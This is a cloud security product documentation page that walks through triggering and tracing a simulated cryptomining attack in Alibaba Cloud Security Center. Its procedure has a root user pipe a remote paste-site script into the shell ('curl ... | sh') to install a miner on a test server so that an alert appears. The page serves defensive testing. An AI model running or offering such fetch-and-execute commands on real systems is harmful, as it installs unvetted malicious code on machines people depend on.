Best practices for responses and tracing - Access Security Center| Alibaba Cloud Documentation Center

After network attacks occur, Security Center presents and analyzes the attacks on your assets. This allows you to construct a protection system at a finer-grained level. This topic describes the best practices for tracing attacks.

Prerequisites

An Elastic Compute Service (ECS) instance that runs Ubuntu 16.04 is created, and the runtime of the instance exceeds 2 hours. For more information, see Create and manage an ECS instance by using the ECS console (express version)Quick start.
The Enterprise or Ultimate edition of Security Center is purchased two hours before you perform the operations in this topic. For more information, see Purchase Security Center.

Procedure

Log on to the ECS instance as the root user over SSH. In this example, the instance is used as a test server.
Run the curl https://pastebin.com/raw/ffbqpKTn | sh command to insert a mining program to the server.
After the command is executed, wait for 3 minutes before you perform the next step.
Log on to the Security Center console.
In the left-side navigation pane, choose Detection > Alerts.
On the Alerts page, view the alert on the mining program.
Click the alert name to view details.
Click the Diagnosis tab to view the tracing information in the alert.

Note You can view the tracing information only 10 minutes after you perform Step 2. For more information, see Use the attack source tracing feature.